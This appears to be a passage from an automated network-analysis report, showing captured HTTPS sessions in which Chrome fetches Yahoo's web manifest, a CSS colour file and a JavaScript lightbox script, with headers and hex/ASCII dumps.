                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tedweatherLocationUuid]\" id=\"weather-autocomplete\" name=\"location-picker\" placeholder=\"Enter City or Zipcode\" spellcheck=\"false\" tabindex=\"0\" title=\"Search\"/></div></div></li><li id=\"weather-autocomplete-suggestions\" class=\"Ov(a) Mah(86px)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              115192.168.2.45113787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC534OUTGET /manifest_desktop_us.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC850INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: vGLdR9oIWpQ5BqbqeSYBMKFrgSylcBykGKabRbsjGRCwO7Ustci4ObiRwWaGpwbY6xep+gjfwjQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 912FANDW1W3ZJM73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 07:18:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 05 Sep 2024 07:54:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=259200, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: jLngIqgQRWInvwPv1EyGjPzqBJsBnmTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 2146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "9faf9f0af03805fd10e24fd7a54ca611"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 215709
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC787INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC1300INData Raw: 7b 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 20 22 23 66 66 66 66 66 66 22 2c 0a 20 20 20 20 22 64 69 73 70 6c 61 79 22 3a 20 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 0a 20 20 20 20 22 67 63 6d 5f 75 73 65 72 5f 76 69 73 69 62 6c 65 5f 6f 6e 6c 79 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 69 63 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 34 38 78 34 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 30 39 30 36 32 30 31 38 2f 6d 61 6e 69 66 65 73 74 2f 79 61 68 6f 6f 5f 69 6e 73 74 61 6c 6c 5f 34 38 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: { "background_color": "#ffffff", "display": "standalone", "gcm_user_visible_only": true, "icons": [ { "sizes": "48x48", "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_48.png",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC846INData Raw: 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 33 38 34 78 33 38 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 30 39 30 36 32 30 31 38 2f 6d 61 6e 69 66 65 73 74 2f 79 61 68 6f 6f 5f 69 6e 73 74 61 6c 6c 5f 33 38 34 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 35 31 32 78 35 31 32 22 2c 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "type": "image/png" }, { "sizes": "384x384", "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_384.png", "type": "image/png" }, { "sizes": "512x512",


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              116192.168.2.45113987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC553OUTGET /aaq/cprops/colors_1.1.27.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC759INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: iJH2uD8EglaGrPZIzxdztkWdLN2ZcbkRGI2smmj9X62lR0c6hHyO5DxrLq6Y3YrrFhoIol9dpBqo70G5Vn9bsVUJTfoRP0D38pJ2DzCaPKI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: WBSNQW5VQYQNSHWH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 18:01:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 10 Jan 2023 00:56:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "14b81b9d43cc8eb81ae45eebbaae258c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: NXuB5LUlzqQuAXf127xyo2NVNfa.SWqk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 6179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 4316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 3a 72 6f 6f 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 64 61 72 6b 5d 20 5b 64 61 74 61 2d 6d 61 69 6e 74 61 69 6e 2d 63 6f 6c 6f 72 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 20 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 2c 68 74 6d 6c 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 2d 65 6e 61 62 6c 65 64 5d 5b 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3d 6c 69 67 68 74 5d 7b 2d 2d 62 61 72 62 69 65 3a 23 66 38 30 65 35 64 3b 2d 2d 62 61 72 6e 65 79 3a 23 63 63 30 30 38 63 3b 2d 2d 62 61 74 63 61 76 65 3a 23 32 33 32 61 33 31 3b 2d 2d 62 61 74 74 6c 65 73 68 69 70 3a 23 35 62 36 33 36 61 3b 2d 2d 62 6c 61 63 6b 3a 23 30 30 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled] [data-color-scheme=light],html[data-color-theme-enabled][data-color-scheme=light]{--barbie:#f80e5d;--barney:#cc008c;--batcave:#232a31;--battleship:#5b636a;--black:#000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 2c 31 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 31 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 30 38 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 33 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 30 38 29 2c 30 20 34 70 78 20 38 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 31 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 34 3a 30 20 30 20 32 70 78 20 72 67 62 61 28 76 61 72 28 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ation-1:0 1px 0 rgba(var(--rgb-dirty-seagull),1);--elevation-2:0 0 1px rgba(var(--rgb-black),0.1),0 2px 4px rgba(var(--rgb-black),0.08);--elevation-3:0 0 1px rgba(var(--rgb-black),0.08),0 4px 8px rgba(var(--rgb-black),0.1);--elevation-4:0 0 2px rgba(var(-
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 72 67 62 2d 77 68 69 74 65 3a 32 39 2c 33 34 2c 34 30 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 31 29 2c 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 38 35 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 33 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 2c 30 20 34 70 78 20 38 70 78 20 72 67 62 61 28 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rgb-white:29,34,40;--elevation-1:0 1px 0 rgba(var(--rgb-black),1),0 0 1px rgba(var(--rgb-black),0.85);--elevation-2:0 0 1px rgba(var(--rgb-black),0.9),0 2px 4px rgba(var(--rgb-black),0.92);--elevation-3:0 0 1px rgba(var(--rgb-black),0.92),0 4px 8px rgba(v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 35 3b 2d 2d 72 67 62 2d 67 72 65 79 2d 68 61 69 72 3a 34 34 2c 35 34 2c 36 33 3b 2d 2d 72 67 62 2d 69 6e 6b 77 65 6c 6c 3a 32 35 35 2c 32 35 35 2c 32 35 35 3b 2d 2d 72 67 62 2d 77 68 69 74 65 3a 32 39 2c 33 34 2c 34 30 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 31 3a 30 20 31 70 78 20 30 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 31 29 2c 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 38 35 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 29 2c 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 76 61 72 28 2d 2d 72 67 62 2d 62 6c 61 63 6b 29 2c 30 2e 39 32 29 3b 2d 2d 65 6c 65 76 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5;--rgb-grey-hair:44,54,63;--rgb-inkwell:255,255,255;--rgb-white:29,34,40;--elevation-1:0 1px 0 rgba(var(--rgb-black),1),0 0 1px rgba(var(--rgb-black),0.85);--elevation-2:0 0 1px rgba(var(--rgb-black),0.9),0 2px 4px rgba(var(--rgb-black),0.92);--elevation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC979INData Raw: 65 70 73 3a 23 37 64 63 62 66 66 3b 2d 2d 70 6c 61 79 64 6f 68 3a 23 32 31 64 38 37 64 3b 2d 2d 72 61 6d 6f 6e 65 73 3a 23 32 63 33 36 33 66 3b 2d 2d 73 61 70 70 68 69 72 65 3a 23 32 66 30 30 36 30 3b 2d 2d 73 63 6f 6f 74 65 72 3a 23 30 30 36 33 65 62 3b 2d 2d 73 65 61 2d 66 6f 61 6d 3a 23 31 31 64 33 63 64 3b 2d 2d 73 68 61 72 6b 3a 23 38 32 38 61 39 33 3b 2d 2d 73 6b 79 3a 23 31 32 61 39 66 66 3b 2d 2d 73 6d 75 72 66 65 74 74 65 3a 23 31 38 38 66 66 66 3b 2d 2d 73 6f 6c 6f 2d 63 75 70 3a 23 65 62 30 66 32 39 3b 2d 2d 73 70 69 72 75 6c 69 6e 61 3a 23 30 30 39 63 39 34 3b 2d 2d 73 74 61 72 66 69 73 68 3a 23 37 37 35 39 66 66 3b 2d 2d 73 77 65 64 69 73 68 2d 66 69 73 68 3a 23 66 66 33 33 33 61 3b 2d 2d 74 68 61 6e 6f 73 3a 23 39 30 37 63 66 66 3b 2d 2d 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: eps:#7dcbff;--playdoh:#21d87d;--ramones:#2c363f;--sapphire:#2f0060;--scooter:#0063eb;--sea-foam:#11d3cd;--shark:#828a93;--sky:#12a9ff;--smurfette:#188fff;--solo-cup:#eb0f29;--spirulina:#009c94;--starfish:#7759ff;--swedish-fish:#ff333a;--thanos:#907cff;--t


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              117192.168.2.45114087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC369OUTGET /aaq/wf/wf-lightbox-1.10.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: jJGy0udaaCcPYcsvqYgoxfnjM+RVTifEGhdasO+svI4y51iTX5Gw+Rzt+JdApreQ95NVeP8I8+0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: H4XC93BFNC4GNMJQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sun, 06 Oct 2024 20:18:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 01 Mar 2023 01:43:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "69831b2f7b26bc6dd6321c8dcde85968"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: K.68hs0p5c2EOJjfXuKP9dx0XBa4hSTK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 168925
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototype
